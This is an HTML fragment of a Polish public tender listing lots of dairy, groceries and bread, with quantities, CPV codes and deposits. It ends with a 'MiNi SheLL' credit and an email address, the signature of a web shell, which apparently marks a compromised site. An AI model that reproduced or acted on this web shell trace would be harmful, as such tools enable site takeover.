<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Nabiał
Wadium 2 500,00 zł.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 
      Zawartość tłuszczu, opakowanie	 J.m. 	 Ilość 
1.	Mleko 2 % a 1 l lub 5 l	l	60 000
2.	Masło 82 % a 200 g	kg	2 100
3.	Śmietana 18 % a 330 lub a 400 ml lub 500 ml	l	1 500
4.	Śmietana 12 % a 400 ml lub 330 ml	l	800
5.	Ser twardy 40 % tłuszczu  a 1 kg	kg	300
6.	Ser topiony a 100g	                          kg.	130
7.	Serek homogenizowany 9 % a 125 g, 150g	kg	120
8.	Twaróg 15 % a 250 g (półtłusty)	kg	1 500
9.	Jogurt 2,5 % a 150 g, 125 g	             kg	175
10.	Maślanka naturalna a 1 lub 0,4 l litr	l	1 000
11.	Serek wiejski  a 200 g	             kg	200
12.	Kefir naturalny  a 200 g	             kg	100
13.	Margaryna  a 0,50 g i 0,250 g	kg	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3. Przyprawy, sosy koncentraty i zupy
Wadium 1 500,00 zł.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 	                        J.m. 	 Ilość 
1.	Koncentrat pomidorowy a 200 g	kg	550
2.	Chrzan tarty a 280 g	kg	100
3.	Groszek konserwowy a 400 g	kg	100
4.	Kukurydza konserwowa a 400 g	kg	50
5.	Ogórki konserwowe a 0,9 kg	kg	300
6.	Papryka konserwowa a 0,7 kg	kg	100
7.	Syrop a 0,5 l	                          l	120
8.	Budyń a 40 g	                         kg          	20
9.	Cukier kryształ a 10 kg	            kg	6 000
10.	Cukier waniliowy a 0,016 kg	            kg	4
11.	Cynamon a 0,02 kg                         kg	0.3
12.	Czosnek suszony a 0,02 kg	            kg	2,50
13.	Galaretka owocowa a 0,10 kg           kg	15
14.	Herbata granulowana a 0,10kg          kg	100
15.	Herbata liściasta a 0,10 kg	            kg	100
16.	Kakao a 0,10 kg	                         kg	25
17.	Kawa inka a 0,15 kg	            kg	210
18.	Kisiel a 0,06 kg	                         kg	30
19.	Kwasek cytrynowy a 0,02 kg	            kg	80
20.	Liście laurowe a 0,015 kg	            kg	1
21.	Majeranek a 0,02 kg	            kg	1,50
22.	Musztarda a 0,9 kg	                         kg	50
23.	Ocet a 0,5 l	                         l	80
24.	Olej uniwersalny a 1 l	            l 	400
25.	Pieprz naturalny a 0,02 kg	            kg	10
26.	Pieprz ziołowy a 0,02 kg	            kg	15
27.	Proszek do pieczenia a 0,02 kg          kg	0,40
28.	Przyprawa w płynie do zup a 1 l	l	150
29.	Sól a 25 kg	                         kg	1 800
30.	Ziele angielskie a 0,02 kg	            kg	5
31.	Żelatyna spożywcza a.0,05 kg          kg	2
32.	Papryka mielona a 0,02 kg	            kg	0,50
33.	Przyprawa Vegetta a 0,20 kg lub równoważne	kg	80
34.	Rosół drobiowy a 0,12 kg	            kg	25
35.	Zupa ogonowa a 0,06 kg	            kg	10
36.	Zupa pieczarkowa a 0,06 kg	            kg	15
37.	Zupa grzybowa a 0,04 kg	            kg	15
38.	Napój w proszku a 1 kg	            kg	110
39.	Kasza gryczana a 1kg	            kg	400
40.	Kasza jęczmienna a 1kg	            kg	300
41.	Kasza manna a 1 kg	            kg	600
42.	Mąka pszenna TYP 450 a 10 kg         kg	500
43.	Mąka pszenna TYP 500 a 10 kg         kg	1 500
44.	Mąka ziemniaczana a 1 kg, 0,50 kg    kg 	200
45.	Płatki nestle neustik a 0,5 kg, 0,250 kg	kg	25
46.	Płatki kukurydziane a 5 kg, 0,50 kg	kg	600
47.	Płatki jęczmienne a 0,5 kg	kg	450
48.	Płatki owsiane a 0,5 kg	kg	600
49.	Płatki ryżowe a 0,2 kg	kg	400
50.	Ryż a 1 kg	             kg	1 750
51.	Biszkopty a 350 g	             kg	35
52.	Herbatniki a 2,5 kg 	kg	160
53.	Suchary a 300 g	             kg	50
54.	Makaron a 10 kg, 1 kg, 0,50 kg	kg	2 000
55.	Majonez a 0,25 kg, 0,50 kg, 0,40 kg	kg	200
56.	Ogórki kwaszone a 0,90 kg	             kg	50
57.	Koper susz	                          kg	10
58.	Natka susz	                          kg	10
59.	Dżem a 0,300 g do 12 kg	             kg	150
60.	Powidła a 0,300 g do 1 kg	             kg	90
61.	Marmolada a 0,300 g do 1 kg	kg	90
62.	Soda a 1 kg	                          kg	5
63.	Keczup a 0,50 kg , 1 kg	             kg	50
64.	Margaryna a 0,250 g, 0,50 kg	kg	600
65.	Konserwy rybne a 0,180 g, 0,200g	kg	100
66.	Paprykarz lub równoważne	             kg	100
67.	Przyprawa Kucharek lub równoważne	kg	30
68.	Kasza jaglana a 0,50 kg, 1 kg	kg	150
69.	Kasza kukurydziana 0,50 kg, 1 kg	kg	200
70.	Krakersy lub równoważne 0,180 g	kg	40
71.	Pieczywo Vasa różne lub równoważne a 100 g, 200 g	kg	15
72.	Mleko w proszku Nan lub równoważne a 0,350 g	kg	50
73.	Mleko w proszku Bebiko lub równoważne a 0,350 g	kg	100
74.	Sok owocowy a 330 mln, 1 l	                                      l	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4. Pieczywo
Wadium 1 000,00 zł.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 	                      Ilość w szt.
1.	Chleb 1,000 kg		            13 000
2.	Bułka 0,400 kg		             40 000
3.	Bułka 0,100 kg		             30 000
4.	Chleb razowy 1,000  kg 		1 100
5.	Drożdżówka 0,080 kg		800
6.	Bułka grahamka 0,100 kg		1 200
7.	Pączki a 100 g, 0,080 kg		250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com